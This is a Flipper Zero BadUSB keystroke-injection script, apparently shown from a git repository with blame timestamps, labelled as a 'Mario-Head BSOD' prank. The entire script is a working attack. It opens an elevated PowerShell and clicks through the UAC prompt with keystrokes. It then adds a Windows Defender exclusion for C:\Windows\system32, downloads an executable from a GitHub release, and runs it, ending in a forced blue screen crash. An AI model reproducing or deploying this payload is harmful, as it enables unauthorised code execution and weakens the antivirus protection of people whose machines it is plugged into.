Flipper/BadUSB/Mario-head.txt

25 lines
955 B
Plaintext
Raw Permalink Normal View History

2022-07-31 03:35:32 +00:00
REM Title: Mario-Head BSOD
REM Author: FalsePhilosopher
2022-08-28 17:03:14 +00:00
REM Target: Win 10+, exe is Windows 7 and up 32/64 bit
2022-07-31 03:35:32 +00:00
REM Props: Hak5, bemxio for creating mario-head https://github.com/bemxio/mario-head, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
REM Version: 1.0
REM Category: Prank
REM Display a video of Mario's levitating head asking if he can have your computer and invokes a BSOD.
REM
REM startup delay
2022-08-28 17:03:14 +00:00
DELAY 500
2022-07-31 03:35:32 +00:00
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
2022-08-28 17:03:14 +00:00
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
2022-07-31 03:35:32 +00:00
ENTER
2022-08-28 17:03:14 +00:00
DELAY 1500
2022-07-31 03:35:32 +00:00
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
ENTER
2022-08-28 17:03:14 +00:00
DELAY 500
STRING $down=New-Object System.Net.WebClient;$url='https://github.com/bemxio/mario-head/releases/latest/download/mario_dist.exe';$file='mario_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
2022-07-31 03:35:32 +00:00
ENTER